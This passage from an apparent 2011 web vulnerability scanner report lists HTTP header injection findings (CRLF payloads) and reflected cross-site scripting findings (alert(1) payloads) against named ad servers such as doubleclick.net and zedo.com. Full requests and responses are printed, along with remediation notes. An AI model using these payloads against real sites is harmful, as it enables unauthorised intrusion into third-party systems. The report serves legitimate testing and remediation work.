HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/678b5
8384566a10f
/tmg.telegraph.sponsored/sponsored.travel;at=header;pos=1;sc=sponsored-travel;pt=story;pg=8509794;lvl=3;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305509216094:
Date: Mon, 16 May 2011 01:35:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad-emea.doubleclick.net/adj/tmg.telegraph.sponsored/sponsored.travel.disney [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adj/tmg.telegraph.sponsored/sponsored.travel.disney

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6df0f%0d%0a9d7229a8f0d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6df0f%0d%0a9d7229a8f0d/tmg.telegraph.sponsored/sponsored.travel.disney;at=header;pos=1;sc=sponsored-travel-disney;pt=story;pg=8509938;lvl=4;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305508777021? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6df0f
9d7229a8f0d
/tmg.telegraph.sponsored/sponsored.travel.disney;at=header;pos=1;sc=sponsored-travel-disney;pt=story;pg=8509938;lvl=4;biw=1136;bih=902;fv=10;sz=1x1;tile=1;ord=1305508777021:
Date: Mon, 16 May 2011 01:21:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 237ec%0d%0a880ab23038f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /237ec%0d%0a880ab23038f/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/237ec
880ab23038f
/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http: //ads.bluelithium.com/clk
Date: Mon, 16 May 2011 01:34:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.4. http://ad.doubleclick.net/adi/N4975.1207.TRAVELOCITY.COM/B5393428.18 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4975.1207.TRAVELOCITY.COM/B5393428.18

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8fa4b%0d%0a608cfb9867d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8fa4b%0d%0a608cfb9867d/N4975.1207.TRAVELOCITY.COM/B5393428.18;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d122243%26AdID%3d164325%26TargetID%3d8852%26Segments%3d1,9,3090,4300,4303,5796,5907,9520,10495,11148,12670,13331,18268,20052,20168,20299,20311,21094,21281%26Targets%3d8427,8852,28340,30167,30402,30431,31703,31958,8948%26Values%3d25,30,51,60,72,80,92,101,110,152,194,215,234,261,293,2176,2218,2285,2305,2306,2307,2308,2310,2340,2342,2343,2359,2432,2468,2537,4760,4772,6472,6474,6974,8257,8512,8829,9120,9844,9845,9846,12194,12196%26Redirect%3d;ord=nkufyk,bgKaRRRrgqcz? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=cruise&paxa=0&paxs=0&paxc=0&adloc=NA&random=813059&tile=534041638164681
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8fa4b
608cfb9867d
/N4975.1207.TRAVELOCITY.COM/B5393428.18;sz=160x600;click=http: //dm.travelocity.com/event.ng/Type=click&FlightID=122243&AdID=164325&TargetID=8852&Segments=1,9,3090,4300,4303,5796,5907,9520,10495,11148,12670,13331,18268,20052,20168,20299,20311,21094,21281&Targets=8427,8852,28340,301
Date: Mon, 16 May 2011 01:30:30 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.5. http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5823.DbclkAdEx/B5478635.45

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2e63e%0d%0a47716407f97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2e63e%0d%0a47716407f97/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W5ZugEAbQABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9942530385485090&output=html&h=90&slotname=7409232867&w=728&lmt=1305527557&flash=10.3.181&url=http%3A%2F%2Fsecureshopping.mcafee.com%2F&dt=1305509556443&bpp=3&shv=r20110509&jsv=r20110506&correlator=1305509557695&frm=0&adk=2067801485&ga_vid=934359654.1305509558&ga_sid=1305509558&ga_hid=579067022&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1120&bih=902&fu=0&ifi=1&dtd=1275&xpc=N75PYouOId&p=http%3A//secureshopping.mcafee.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2e63e
47716407f97
/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109:
Date: Mon, 16 May 2011 01:42:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.6. http://ad.doubleclick.net/adi/x1.dt/dt [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.dt/dt

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 84877%0d%0ac4dfd0f2329 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /84877%0d%0ac4dfd0f2329/x1.dt/dt;sz=1x1;ord=1289783? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest;sz=728x90;click=http://bn.xp1.ru4.com/bclick?_f=8BWls1L7DgGK&_o=15607&_eo=747980&_et=1305508796&_a=1791737&_s=0&_d=1125798&_pm=747980&_pn=17918465&redirect=;u=17918465;ord=6394684?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/84877
c4dfd0f2329
/x1.dt/dt;sz=1x1;ord=1289783:
Date: Mon, 16 May 2011 01:25:42 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.7. http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5155.272756.AOL-ADVERTISING/B5116932

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13a44%0d%0ad08cd4fa359 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13a44%0d%0ad08cd4fa359/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000786652/mnum=0001007584/cstr=71920917=_4dd07bc9,3027560310,786652%5E1007584%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=71920917/optn=64?trg=;ord=3027560310? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13a44
d08cd4fa359
/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000786652/mnum=0001007584/cstr=71920917=_4dd07bc9,3027560310,786652^1007584^1183^0,1_/xsxdata=$xsxdata/bnum=71920917/optn=64
Date: Mon, 16 May 2011 01:26:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.8. http://ad.doubleclick.net/adj/pmv.telegraph.tg/sponsored [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/pmv.telegraph.tg/sponsored

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 858b0%0d%0a7d93e849469 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /858b0%0d%0a7d93e849469/pmv.telegraph.tg/sponsored;cat=sponsored/travel.disney;tile=1;sz=468x60,728x90;dcopt=ist;ord=1305508777021? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/858b0
7d93e849469
/pmv.telegraph.tg/sponsored;cat=sponsored/travel.disney;tile=1;sz=468x60,728x90;dcopt=ist;ord=1305508777021:
Date: Mon, 16 May 2011 01:21:36 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.9. http://c7.zedo.com/utils/ecSet.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 745cd%0d%0aa239816aaf was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=745cd%0d%0aa239816aaf&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; ZEDOIDX=29; FFgeo=2241452; FFChanCap=1595B496,121#543485#876543#675101#543481#675099|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1; FFSkp=305,3603,15,1:; FFcat=305,3603,15:496,121,14:496,121,7:496,121,9; FFad=0:15:1:5; FFCap=1595B305,212785|0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 745cd
a239816aaf
;expires=Wed, 15 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "637af42d-1f5-47f291fef3640"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6911
Date: Mon, 16 May 2011 01:30:24 GMT
Connection: close

5. Cross-site scripting (reflected)
There are 126 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and it should be HTML-encoded at every point where it is copied into an application response.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

5.1. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89ce2"-alert(1)-"bc963da0405 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=8821889ce2"-alert(1)-"bc963da0405&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8441
Date: Mon, 16 May 2011 01:28:23 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
lMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=8821889ce2"-alert(1)-"bc963da0405&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmo
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad20f"-alert(1)-"672c7ef153f was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371ad20f"-alert(1)-"672c7ef153f&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8441
Date: Mon, 16 May 2011 01:29:21 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371ad20f"-alert(1)-"672c7ef153f&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.htm
...[SNIP]...

5.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5009"-alert(1)-"6877c3dfa7c was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

